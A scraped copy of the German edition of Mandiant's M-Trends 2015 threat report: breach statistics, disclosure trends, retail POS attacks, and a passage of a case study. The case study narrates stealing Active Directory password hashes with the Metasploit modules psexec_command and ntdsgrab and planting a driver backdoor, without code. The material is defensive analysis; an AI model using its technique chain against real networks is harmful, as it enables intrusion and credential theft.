m-trends 2015: ein blick in die praxis

28
Bericht zur Bedrohungslage Ein Bericht von der Cyberfront M-Trends ® 2015: Sicherheits- beratung

Upload: fireeye-inc

Post on 16-Apr-2017

532 views

Category:

Technology


0 download

TRANSCRIPT

Page 1: M-Trends 2015: Ein Blick in die Praxis

B e r i c h t z u r B e d r o h u n g s l a g e

Ein Bericht von der Cyberfront

M-Trends® 2015:

Sicherheits- beratung

Page 2: M-Trends 2015: Ein Blick in die Praxis

Ein Bericht von der CyberfrontM-Trends

Einleitung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1

Die Opfer in Zahlen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

Trend Nr. 1: Opfer im Rampenlicht . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

Eine gut informierte Öffentlichkeit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

Steigende Erwartungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

Warum werden Angriffe zunehmend bekannt gegeben? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

Trend Nr. 2: Einzelhändler im Fadenkreuz . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

Virtuelle Anwendungsserver als Einfallstor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

Neue Tools, Methoden und Prozesse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN-Authentifizierung . . . . . . . 7

Empfehlungen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12

Trend Nr. 3: Raffiniertere Angriffsabläufe . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

Hacken von VPN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

Bessere Tarnung für Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

Tools und Tricks für den Kennwortdiebstahl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18

Navigation mit WMI und PowerShell . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19

Trend Nr. 4: Die Grenzen verschwimmen – Kriminelle und APT-Actors imitieren einander . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

Im Zeichen der Unsicherheit die Absicht durchschauen – kein leichtes Unterfangen . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

Welche Rolle spielen diese Unterschiede? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

Schlussfolgerung . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23

Über Mandiant . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

Über FireEye . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

Inhalt

Page 3: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 1

EinleitungBei Mandiant sind wir seit Jahren davon überzeugt, dass es keine absolute Sicherheit geben kann. Die Ereignisse des Jahres 2014 bestätigen dies.

Die Wirksamkeit der Sicherheitsmaßnah men in Unternehmen ist im vergangen en Jahr leicht gestiegen . Trotzdem geht das Wett-

rüsten zwischen Angreifern und Verteidigern wei-ter und Hacker finden ständig neue Methoden, um Sicherheitsmaßnahmen zu um gehen .

In „M-Trends 2014“ berichteten wir, dass die Cyber-security sich von einem Thema, an dem einige weni-ge IT-Verantwortliche interessiert waren, zu einer der obersten Prioritäten für die Unternehmens-leitung entwickelt hatte . In diesem Jahr rückte die Cybersicherheit – oder streng genommen die Cyber unsicherheit – in den Blickpunkt der Öffent-lichkeit . Seit Jahresbeginn 2015 wurde das Thema von US-Präsident Obama in seiner Ansprache zur Lage der Nation¹, als Grundlage für einen Holly-wood-Film² und selbst in einem Gag bei der Verlei-hung des Gol den Globe³ aufgegriffen .

Da die Berater von Mandiant nach einem schwerwie-genden Angriff oft unter den Ersten sind, die eine kritische Situation analysieren, haben wir einen be-sonders guten Einblick in die sich ändernden Motive und Taktiken von Hackern . Wir ar beiten seit über zehn Jahren mit Kunden in mehr als 30 Branchen weltweit zusammen . Die in diesem Dokument prä-sentierten Erkenntnisse und Analysen beruhen auf der Erfahrung, die wir bei der Untersuchung Hun-derter kompromittierter Infrastrukturen gesam-melt haben .

Unternehmen haben kleine Fortschritte zu verzeichnen, doch Hacker bleiben noch immer zu lange unentdeckt, nachdem sie in eine Unternehmens umgebung ein-gedrungen sind . Der Mittelwert lag 2014 bei 205 Tagen, im Vergleich zu 229 Tagen im Vorjahr . Der Anteil der Unternehmen, die ein Eindringen von Hackern intern aufdeckten, ging sogar leicht zurück: 2014 wurden in 69 Prozent der von uns untersuch-ten Fälle die betroffenen Unternehmen von der Poli-zei oder einem anderen Dritten auf die Sicherheits-verletzung aufmerksam gemacht, 2013 waren es 67 Prozent und im Jahr davor 63 Prozent.

Der Einzelhandel hatte mit den meisten Vorfällen zu kämpfen, da Angreifer neue Metho den zum Stehlen von Kreditkartendaten von POS-Terminals ausnutzten . In Regionen, wo Kreditkarten mit einem Prozessorchip und einer PIN geschützt sind, stieg die Anzahl der Angriffe auf E-Commerce-Unternehmen und Dienstleister, die Online-Zahlungen abwickeln .

Mehrere Branchen, in denen wir bislang eher selten Vorfälle zu verzeichnen hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter Unternehmens- und Beratungsservices, das Gesundheitswesen sowie Behörden und inter-nationale Organisationen .

Wenn Sicherheitsteams neue Abwehrmaßnah men installieren, finden Hacker neue Methoden, um sie zu umgehen . Das zeigte sich auch 2014, als Angrei-fer neue Methoden bzw . raffiniertere Versionen bekannter Methoden nutzten, um virtuelle private Netzwerke (VPN) zu hacken, unentdeckt zu bleiben, Anmeldedaten zu stehlen und über einen langen Zeitraum hinweg Zugriff auf die gehackten Umge-bungen zu erhalten .

Darüber hinaus ging 2014 eine Rekordzahl von Op-fern der Internetkriminalität an die Öffentlichkeit . Eine der ersten Fragen, die immer ge stellt wird, war dabei schwerer zu beantworten als in der Vergan-genheit: Wer war das? Die Grenzen zwischen „gewöhnlichen“ Internetkri minellen und staatlich gesponserten Angreifern verschwimmen zuneh-mend, da Erstere immer raffinierter werden und Letztere oft gängige Schwarzmarkttools verwen-den, um in der „Szene“ weniger aufzufallen .

Zusammenfassend lässt sich sagen, dass die Bedro-hungslage derzeit komplexer ist als je zuvor . Für Sicher heitsteams bedeutet das, dass es immer schwie riger – und immer wichtiger – wird, Angriffs-versuche zu entdecken, zu analysieren, abzuwehren und eventuelle Schäden schnell zu beheben .

1 Michael D . Shear, The New York Times, „Obama to Announce Cybersecurity Plans in State of the Union Preview“, Januar 2015 2 Sheri Linden, The Hollywood Reporter, „Blackhat: Film Review“, Januar 20153 Christopher Palmeri, Bloomberg, „Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes“, Januar 2015

Page 4: M-Trends 2015: Ein Blick in die Praxis

2 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Mehrere Branchen, in denen wir in früheren Jahren eher selten Vorfälle untersucht hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter:

Unternehmens- und Beratungsservices

Staatliche und internationale Organisa- tionen

Gesundheitswesen

6 %Gesundheits-wesen

5 %Transport-wesen

3 %Luft-, Raum-fahrt- und Rüstungs-industrie

7 %Juristische Dienstleister

8 %Sonstige

7 %IT und andere High-Tech-Branchen

8 %Bau- und Inge-nieurwesen

17 %Unternehmens- und Beratungsservices

7 %Staatliche und interna-tionale Organisationen

14 %Einzelhandel

10 %Finanzdienstleis-tungen

3%

8 %Medien und Unter-haltung

5%

Mehrere wichtige Branchen waren bei unseren Untersuchungen deutlich stärker oder weniger stark vertreten als in den Vorjahren: Einzelhandel: Anstieg von 4 % auf 14 % Medien und Unterhaltung: Rückgang von 13 % auf 8 %

APT-Phishing

der analysierten Phishing-E-Mails hatten IT- oder sicherheitsrelevante Themen als Aufhänger. Viele stamm-ten angeblich von der IT-Abteilung des angegriffenen Unternehmens oder einem Anbieter von Antivirensoftware.

78 %der Phishing-E-Mails wurden an Arbeitstagen versandt.

72 %

So

Sa

Fr

Do

Mi

Di

Mo

Branchen, in denen Mandiant Angriffe untersuchte

Die Bedrohungslage im Überblick

Belästigung Datendiebstahl Internetkriminalität Hacktivismus Sabotage

Ziel Zugriff und Verbreitung

ökonomischer bzw. politischer Vorteil

finanzielle Bereicherung

Verleumdung,

negative öffentliche Aufmerksamkeit

Unterbrechung des Betriebs

Beispiel Botnetze und Spam

APT-Gruppen (Advanced Persistent Threat)

Kreditkarten-diebstahl

Verunstaltung der Website

Löschen von Daten

GezielterAngriff

Merkmal oft automa-tisiert anhaltend oft opportu-

nistisch auffällig konflikt-motiviert

Angreifer verfolgen immer vielfältigere politische und ökonomische Ziele.

Zeit zwischen den ersten nachweisbaren Spuren eines Angriffs bis zu seiner Feststellung

205 TageMittelwert der Zeitspanne, die Angrei-fer in gehackten Netzwerken unbemerkt blieben

24 Tage weniger als 2013

Längste Präsenz: 2982 Tage

So werden Angriffe aufgedeckt

31 %der Opfer bemerkten den Vorfall unterneh- mensintern.

69 %der Opfer wurden von einem Dritten auf den Angriff aufmerksam gemacht.

Die Opfer in Zahlen

Hacker nahmen 2014 ein breites Spektrum an Branchen ins Visier, darunter mehre-re, die in früheren Jahren kaum von Internetkriminalität betroffen waren. Im Schnitt wurden Angriffe rascher aufgedeckt als 2013, doch die Angreifer konnten noch im-mer viel zu lange unbemerkt in gehackten Umgebungen ihr Unwesen treiben. Der Anteil der Opfer, die einen Angriff selbst bemerkten, ging zurück.

Page 5: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 3

Mehrere Branchen, in denen wir in früheren Jahren eher selten Vorfälle untersucht hatten, gehörten 2014 zu den wichtigsten Zielen von Internetkriminellen, darunter:

Unternehmens- und Beratungsservices

Staatliche und internationale Organisa- tionen

Gesundheitswesen

6 %Gesundheits-wesen

5 %Transport-wesen

3 %Luft-, Raum-fahrt- und Rüstungs-industrie

7 %Juristische Dienstleister

8 %Sonstige

7 %IT und andere High-Tech-Branchen

8 %Bau- und Inge-nieurwesen

17 %Unternehmens- und Beratungsservices

7 %Staatliche und interna-tionale Organisationen

14 %Einzelhandel

10 %Finanzdienstleis-tungen

3%

8 %Medien und Unter-haltung

5%

Mehrere wichtige Branchen waren bei unseren Untersuchungen deutlich stärker oder weniger stark vertreten als in den Vorjahren: Einzelhandel: Anstieg von 4 % auf 14 % Medien und Unterhaltung: Rückgang von 13 % auf 8 %

APT-Phishing

der analysierten Phishing-E-Mails hatten IT- oder sicherheitsrelevante Themen als Aufhänger. Viele stamm-ten angeblich von der IT-Abteilung des angegriffenen Unternehmens oder einem Anbieter von Antivirensoftware.

78 %der Phishing-E-Mails wurden an Arbeitstagen versandt.

72 %

So

Sa

Fr

Do

Mi

Di

Mo

Branchen, in denen Mandiant Angriffe untersuchte

Die Bedrohungslage im Überblick

Belästigung Datendiebstahl Internetkriminalität Hacktivismus Sabotage

Ziel Zugriff und Verbreitung

ökonomischer bzw. politischer Vorteil

finanzielle Bereicherung

Verleumdung,

negative öffentliche Aufmerksamkeit

Unterbrechung des Betriebs

Beispiel Botnetze und Spam

APT-Gruppen (Advanced Persistent Threat)

Kreditkarten-diebstahl

Verunstaltung der Website

Löschen von Daten

GezielterAngriff

Merkmal oft automa-tisiert anhaltend oft opportu-

nistisch auffällig konflikt-motiviert

Angreifer verfolgen immer vielfältigere politische und ökonomische Ziele.

Zeit zwischen den ersten nachweisbaren Spuren eines Angriffs bis zu seiner Feststellung

205 TageMittelwert der Zeitspanne, die Angrei-fer in gehackten Netzwerken unbemerkt blieben

24 Tage weniger als 2013

Längste Präsenz: 2982 Tage

So werden Angriffe aufgedeckt

31 %der Opfer bemerkten den Vorfall unterneh- mensintern.

69 %der Opfer wurden von einem Dritten auf den Angriff aufmerksam gemacht.

Page 6: M-Trends 2015: Ein Blick in die Praxis

4 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Trend Nr. 1: Opfer im RampenlichtNach einem Cyberangriff finden betroffene Unternehmen sich immer häufiger im Brennpunkt eines Medienspektakels wieder – und sollen alle Einzelheiten des An-griffs offenlegen.

Im Verlauf des Jahres 2014 arbeiteten wir mit über 30 Unternehmen zusammen, die die Öffentlichkeit über einen Datendiebstahl

informieren mussten – oft im grellen Scheinwer-ferlicht einer Pressekonferenz . Unserer Erfah-rung nach tragen bestätigte Informationen über den Umfang und die Reichweite eines Angriffs dazu bei, dass das betroffene Unternehmen kompetent und souverän erscheint . In der Regel lassen sich dadurch auch das spätere Revidieren vorangegangener Meldungen und der damit ver-bundene Verlust an Glaubwürdigkeit vermeiden .

Eine gut informierte Öffentlichkeit

Eine scheinbar endlose Kette von Meldungen über Datendiebstähle sensibilisierte die Öffent lichkeit 2014 für die Gefahren und möglichen Auswirkun-gen gezielter Cyberangriffe . Das führte dazu, dass bei jeder neuen Enthüllung fundiertere und de-tailliertere Fragen an die Opfer gestellt wurden . Die Medien, Partner, Investoren und Kunden wollen inzwischen weit mehr wissen als wann der Angriff erfolgte und welche Daten betroffen waren . Sie verlangen detaillierte Angaben über alles, vom be-nutzten Malwaretyp bis hin zu den Methoden, mit denen die Angrei fer sich den Zugriff auf Unterneh-mensressour cen offen halten konnten .

Zudem stehen die Opfer von Cyberangriffen zuneh mend unter dem Druck, die Identität des Angreif ers bekannt zu geben . Wir werden häufig schon am ersten Tag einer Untersuchung gefragt, welche Hackergruppe hinter einem Angriff steckt . Zu diesem Zeitpunkt haben wir jedoch gerade erst damit begonnen, die verfügbaren Fakten zusam-menzutragen . Gleichzeitig wird es immer schwerer, diese Frage überhaupt zu be antworten, da die ver-schiedenen „Verdächtigen“ zunehmend dieselben Tools benutzen (siehe Trend Nr . 4: „Die Grenzen verschwimmen – Kriminelle und APT-Actors imitie-ren einander“ auf Seite 20) .

Steigende Erwartungen

Da das öffentliche Interesse an Cyberangriffen steigt, wird den Verantwortlichen in betroffenen Unternehmen zunehmend klar, wie wichtig eine wirksame und konsistente Öffentlichkeitsarbeit ist, wenn Hacker in die IT-Infrastruktur des Unterneh-mens eingedrungen sind . Immer mehr Cyberan-griffe werden öffentlich bekannt gegeben . Für die Opfer ist das mit schwierigen Ent scheidungen darüber verbunden, wie viele Details sie preisgeben möchten – und diese Ent scheidungen müssen oft getroffen werden, wenn noch lange nicht alle Fak-ten bekannt sind .

Beim Erstellen einer Strategie für die Öffentlichkeitsarbeit ist ein solides Ver-ständnis des Ausmaßes und der Reichweite des Angriffs unverzichtbar . Nur so lassen sich das spätere Revidieren vorangegangener Meldungen und der damit verbundene Verlust an Glaubwürdigkeit vermeiden .

Page 7: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 5

Beim Erstellen einer Strategie für die Öffentlich-keitsarbeit ist ein solides Verständnis des Ausma-ßes und der Reichweite des Angriffs unverzichtbar . Nur so lassen sich das spätere Revidie ren vorange-gangener Meldungen und der damit verbun dene Verlust an Glaubwürdig keit vermei den .

Zudem fällt es vielen betroffenen Unternehmen schwer, die Berichterstattung unter Kontrolle zu behalten . Öffentliche Spekulationen darüber, wie es den Angreifern gelungen sein könnte, in ein Un-ternehmen einzudringen, können die Reaktion auf einen Angriff beispielsweise ernst haft behindern . Wir haben in mehreren Fällen beobachtet, dass Si-cherheitsexperten bereits wertvolle Zeit mit dem Widerlegen solcher Hypo thesen verbringen mussten, noch bevor sie das Ausmaß des Angriffs abschätzen oder ihn eindämmen konnten .

Warum werden Angriffe zunehmend bekannt gegeben?

Wir werden oft gefragt, warum sich heute mehr Unternehmen dafür entscheiden, einen erfolgrei-chen Angriff bekannt zu geben . Wir können diese Frage natürlich nicht für jedes Unternehmen defini-tiv beantworten, aber uns sind zwei Faktoren bekannt, die diesen Trend fördern: Erstens mussten wir 2014 im Vergleich zu den Vorjahren häufiger

auf Angriffe reagieren, bei denen Kreditkarten- und andere personenbezogene Daten gestohlen wur-den . Viele Unternehmen müssen solche Fälle bekannt geben, weil gesetzliche Bestimmungen dies vorschreiben .

Zweitens wurden 69 Prozent der Angriffe, die wir 2014 untersuchten, nicht vom Opfer selbst aufge-deckt, sondern von einem unternehmensexternen Dritten, beispielsweise einem Zulieferer, Kunden oder den Ermittlungsbehörden .

Mit anderen Worten: Die Verantwortlichen in den betroffenen Unternehmen mussten davon ausge-hen, dass nicht nur sie selbst und die Angreifer wussten, dass ein Angriff stattgefunden hatte .

Unabhängig davon, ob die Öffentlichkeit über einen erfolgreichen Angriff informiert werden soll oder nicht, verlangen die Entscheidungs trä ger innerhalb des Unternehmens natürlich Antworten auf zahl-reiche Fragen – und zwar sofort . Die Untersuchung kann jedoch Wochen oder sogar Monate dauern und die zur Beantwortung dieser Fragen erforder-lichen Fakten schälen sich oft erst im Verlauf der Untersuchung heraus . Deshalb ist es wichtig, das Ausmaß und die Reichweite eines Sicherheitsvor-falls zu kennen, bevor über die Strategie für die Bekanntgabe der Details entschieden wird .

Fazit : Die Opfer von Cyberangriffen gehen heute mit größerer Wahrscheinlich­keit an die Öffentlichkeit als früher. Das Medieninteresse ist dabei oft groß. Repor­tern, Kunden und Geschäftspartnern ist zunehmend bewusst, dass nicht alle Angrif­fe abgewehrt werden können. Gleichzeitig verlangen sie jedoch mehr Informatio­nen und stellen detailliertere Fragen als noch vor wenigen Jahren. Unternehmen benö tigen eine effektive Strategie für die Öffentlichkeitsarbeit, um sich auf die da­raus resultieren den Diskussionen vorzubereiten. Die besten Strategien basieren auf Fakten aus der gründlichen Untersuchung des Vorfalls.

Page 8: M-Trends 2015: Ein Blick in die Praxis

6 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

Effektive Untersuchung von VorfällenIm Folgenden finden Sie einige häufig gestellte Fragen von Reportern, Investoren,

Kunden und anderen Interessenten an Unternehmen, die Hackern zum Opfer

gefallen sind. Alle Entscheidungsträger und sonstigen Personen, die für das Unter-

nehmen sprechen, sollten die genauen Antworten auf diese Fragen verstehen, um

die Verbreitung mehrdeutiger oder inkonsistenter Informationen zu vermeiden.

Wie sind die Angreifer in Ihre Infrastruk-tur eingedrungen?

Angreifer nutzen in der Regel eine Kombination aus Social Engineering und einer oder mehreren Schwachstellen, die noch nicht bekannt bzw . behoben sind . Als Einfallstor dient dabei beispielsweise ein mit dem Internet verbundener Server oder ein Malware-Anhang in einer E-Mail, der echt genug aussieht, um vom Empfänger geöffnet zu werden . Manche Angreifer infizieren sogar Websites, die von ihren anvisierten Opfern häufig besucht werden . Es ist wichtig, dass ein Unternehmenssprecher erklären kann, wie die Angreifer in die Infrastruktur des Unternehmens einge-drungen sind . Noch wichtiger ist möglicherweise, dass er oder sie auch sagen kann, ob dieses Einfallstor geschlos-sen und die Bedrohung eingedämmt wurde .

Wie haben die Angreifer sich den Zugang zu Ihrer Infrastruktur offengehalten?

Angreifer versuchen meist, sich dauerhaften Zugang zu einer Umgebung zu verschaffen . Um sie vollständig aus Ihrer Infrastruktur zu entfernen, müssen Sie alle genutz-ten Einfallstore finden und schließen . Zu den meistgenutz-ten Einfallstoren gehören sogenannte Backdoors, Web-shells sowie der Zugang zu Ihrem VPN und anderen Syste-men für den Fernzugriff .

Wie ist der Angriff abgelaufen?

Wenn Sie nachvollziehen können, wie ein Angreifer in Ihre Infrastruktur eindringen und Daten stehlen konnte, haben Sie den ersten Schritt zur künftigen Abwehr ähnlicher An-griffe getan . Außerdem ist es schwierig, die Auswirkungen eines Angriffs zu ermitteln und zu beheben, wenn Sie das genaue Ausmaß des Angriffs nicht kennen .

Welche Daten wurden gestohlen?

Um herauszufinden, welche Daten die Angreifer kopiert und entwendet haben, ist meist eine forensische Analyse der betroffenen Systeme erforderlich . Mitunter kann selbst eine solche Analyse diese Frage nicht vollständig beantworten .

Sie sollten in jedem Fall Ihre Rechtsabteilung einbeziehen, um zu ermitteln, welche gesetzlichen Verpflichtungen sich aufgrund der Art der gestohlenen bzw . möglicherweise gestohlenen Daten für Ihr Unternehmen ergeben .

Haben Sie den Vorfall eingedämmt?

Wer die ersten vier Fragen beantworten kann, hat gute Voraussetzungen für die Beantwortung dieser Frage . Wenn Sie den Plan der Angreifer und den Verlauf des An-griffs aufgedeckt haben, können Sie besser auf den Angriff reagieren und mit der Schadensbehebung beginnen .

Page 9: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 7

4 U .S . Department of Homeland Security and U .S . Secret Service: „Backoff Malware: Infection Assessment“, August 2014

Trend Nr. 2: Einzelhändler im FadenkreuzAllein im Jahr 2014 wurden bei über 1000 Einzelhändlern Kundendaten gestohlen, sodass unzählige Kunden ihre Kreditkarten ersetzen lassen mussten.4 Neben der riesigen Anzahl der Angriffe fielen unseren Analysten auch mehrere neue Angrei-fergruppen auf, die diese gebeutelte Branche mit speziellen Tools und Methoden ins Visier nehmen.

Virtuelle Anwendungsserver als Einfallstor

Mithilfe der Anwendungsvirtualisierung lassen sich virtuelle Desktops konfigurieren, bei denen Benut-zer sich per Fernzugriff anmelden, um ei nen be-grenzten Zugriff auf bestimmte Program me zu er-halten . Bei korrekter Konfiguration ist ein virtueller Desktop vollständig von dem physi schen Server ab-geschirmt, auf dem er ausgeführt wird . Die Benut-zer kommen also nicht aus dem virtuellen Desktop „heraus“ und haben keinen direkten Zugriff auf den physischen Server . In manchen Fällen entstehen je-doch schon durch kleine Konfigurationsfehler Lü-cken in der Abschirmung, die es Angreifern ermögli-chen, aus der virtuellen Umgebung „auszubrechen“ und sich direkten Zugriff auf den physischen Server zu verschaffen .

In jedem von uns untersuchten Fall mit diesem An-griffsmuster wurde dieselbe Schwachstelle ausge-nutzt: Für den Fernzugriff auf die Anwen dung wa-ren nur ein Benutzername und Kenn wort erforder-lich . Mit Zwei-Faktor-Authentifizierung lässt sich dieses Einfallstor nahezu vollständig schließen .

Neue Tools, Methoden und Prozesse

Die von uns beobachteten neuen Angreifergruppen nutzten auch neue Tools, Methoden und Prozesse . Die Expertise der Angreifer deckte das gesamte Spektrum ab, von Anfängern mit gängigen Schwarz-markttools bis hin zu technisch versierten Gruppen mit raffinierter, speziell auf be stimmte POS-Syste-me abgestimmter Malware zum Abschöpfen von Kreditkartendaten .

Wir konnten keinen Zusammenhang zwischen den Fähigkeiten und dem Erfolg der Angreifer feststel-len . Insbesondere für US-amerikanische Einzel-händler erwies sich Standardmalware vom Schwarz markt für den Diebstahl von Kreditkarten-daten als ebenso gefährlich wie „professionelle“ Produkte . Jede der von uns untersuchten Angrei-fergruppen konnte die Umgebung ihres Opfers unbemerkt ausspionieren, sich Zugang zu den POS-Terminals verschaffen und die Malware für den Diebstahl der Kreditkartendaten installieren .

Mehr Angriffe auf Online-Shops in Regionen mit Chip-und-PIN-Authentifizierung

Während POS-Terminals in Europa und vielen an-deren Regionen längst einen in der Kreditkarte ent-haltenen Prozessorchip und eine PIN zur Authenti-fizierung nutzen, hat sich das nach sei nen Entwick-lern Europay, MasterCard und Visa benannte EMV- Verfahren in den USA noch immer nicht durchge-setzt . Das soll sich nun endlich ändern .

EMV-fähige Kreditkarten generieren einen eindeu-tigen Code für jede Transaktion und erschweren Hackern das Fälschen von Trans aktionen dadurch erheblich . Möglicherweise konzentrieren sich Cyber kriminelle stattdessen auf leichtere Beute . In Ländern, in denen standardmäßig EMV verwendet wird, untersuchten wir 2014 im Vergleich zu frühe-ren Jahren eine größere Anzahl von Angriffen auf E-Commerce-Unternehmen und Dienstleister, die Online-Zahlungen abwickeln .

Page 10: M-Trends 2015: Ein Blick in die Praxis

8 www .mandiant .com

Ein Bericht von der CyberfrontM-Trends

-Fallstudie

Bei einem Hackerangriff auf eine große US-amerikanische Kaufhauskette wurden die Daten von Millionen von Kreditkarten gestohlen

Dieser Angriff ist typisch für eine Ma sche, der 2014 eine Reihe US-amerika nischer Einzelhändler zum Opfer fielen: Die An-greifer verschafften sich mit gültigen An-meldedaten per Fernzugriff Zugang zu ei-nem System des Opfers und nutzten dann dessen Intranet, um Malware auf den POS-Terminals in den Ladengeschäften zu installieren . Im hier beschriebenen Fall bemerkte das Opfer den Angriff erst, als Behörden drei Mo nate später darauf auf-merksam mach ten .

Eindringen in das Netzwerk

Der Angreifer meldete sich mit gültigen Anmeldedaten bei einem Anwendungs-server der Kaufhauskette an und erhielt einen virtuellen Desktop mit begrenzten Privilegien . Wir konnten keine Anzeichen für fehlgeschlagene Anmeldeversuche fin-den und gehen daher davon aus, dass er sich die Anmeldedaten vor dem Angriff beschafft hatte . Wie ihm das gelang, geht aus den uns vorliegenden Daten nicht hervor .

Der Angreifer nutzte dann einen klei nen Fehler in der Konfiguration des virtuellen Desktops aus, um sich zusätzliche Zu-griffsrechte zuzuweisen, darun ter Zugang zu einem Befehlszeilentool, mit dem er di-rekt auf dem Anwendungs server Befehle ausführen konnte . Damit lud er über Windows FTP ein Tool zum Kopieren von Kennwörtern herunter, mit dem er in den Besitz des Administratorkennworts für den Anwendungsserver gelangte . Alle Syste me im Intra net der Kaufhauskette nutzten dasselbe Administratorkennwort .

All das dauerte nur wenige Minuten .

Ausspionieren und Infizieren des Netzwerks

Der Angreifer nutzte zunächst das Frame-work Metasploit, um die Infra struktur des Opfers auszuspionieren . Metasploit ist ein Open-Source-Framework für Penetra-tionstests, das eine riesige Auswahl an Modulen zum Aufdecken und Ausnutzen von Schwachstellen enthält . Dank dieser Vielfalt erfre ut es sich sowohl bei Sicher-heitsexperten als auch bei Internetkrimi-nellen großer Beliebtheit .

Im vorliegenden Fall wurde das Modul psexec_command genutzt, mit dem Be fehle als Windows-Service auf einem anderen System ausgeführt werden können . Alle Aktionen von psexec_command werden in den Logdateien des Systems protokolliert, auf dem sie ausgeführt werden .

Der Angreifer durchsuchte weiterhin Sys-teme im Intranet, konzentrierte sich aber zunehmend auf den Domänencontroller der Zentraldomäne des Unternehmens-netzwerks . Ein Domänencontroller ist ein Server, der zur Administration der Au-thentifizierung in einer Windows-Umge-bung benötigt wird . Dieser Domänencon-troller hatte dasselbe Administratorkenn-wort wie der zuerst gehackte Server und war daher eine leichte Beute . Der Angrei-fer nutzte das Metasploit-Modul ntdsgrab, um die NTDS-Datenbank und System Registry Hive zu kopieren .

Die NTDS-Datenbank enthält für den Domänencontroller wichtige Daten über Active Directory, unter anderem Benut-zernamen und Kennwort-Hashes . Das Modul ntdsgrab nutzt den Volume Shadow Copy Service (VSS), um eine Schattenko-pie der Partition zu erstellen, auf der die NTDS-Datenbank gespei chert ist . Der eigentl iche Zweck von VSS ist das Erstel-len legitimer Momentaufnahmen für die Datensicherung und -wiederherstellung .

Der Angreifer missbrauchte den Dienst jedoch, um die NTDS-Datenbank zu steh-len . Im Anschluss nutzte er andere Tools, um die Kennwort-Hashes der Domänen-administratoren zu finden und zu knacken . Damit stand ihm praktisch die gesamte Umgebung offen .

Der Angreifer stieg nun auf altbewährte Methoden zum Ausspionieren von Netz-werken um, darunter nicht interaktive An-meldeversuche, das Tool PsExec aus den Microsoft SysInternals und Anmeldever-suche über das Remote Desktop Protocol (RDP) . Nachdem er sich mit den Anmelde-daten des Domänenadministrators auf einem virtualisierten Anwendungsserver angemeldet hatte, konnte der Angreifer sich via RDP mit umfangreichen Zugriffs-rechten auf anderen Systemen einloggen .

Einrichten von Backdoors

Der Angreifer richtete auf mehreren ge-hackten Systemen „Hintertüren“ ein, um sich dauerhaft Zugang zu ihnen zu sichern . Dazu nutzte er einen schädlichen Geräte-treiber, der speziell für Windows XP ent-wickelt wurde .

Dieser Gerätetreiber wurde zur Übertra-gung mit einem raffinierten Packer kom-primiert, der vergleichbaren Tools in hoch entwickelter, aber gängiger Malware äh-nelte . Der Gerätetreiber extrahiert sich zunächst im Arbeits speicher und startet dann einen neuen System-Thread .

Daraufhin schickt der entsprechende legi-time Gerätetreiber eine Nachricht an das System, dass er nicht geladen werden konnte . Da die Malware in einem anderen Prozess ausgeführt wird als der legitime Gerätetreiber, erkennt das System den zusätzlichen Gerätetreiber nicht . Durch diese Verschleie rungstaktik wird die Ana-lyse der Malware und ihrer Funktionen erschwert .

Page 11: M-Trends 2015: Ein Blick in die Praxis

www .mandiant .com 9

-So funktioniert psexec_commandDer auszuführende Befehl und eine Text­datei für die Ausgabe werden in eine Windows­Batchdatei geschrieben. Die Ausgabe­ und die Batchdatei erhalten von einem Zufallsgenerator generierte Namen, die je 16 Zeichen lang sind.

Die Batchdatei wird ausgeführt.

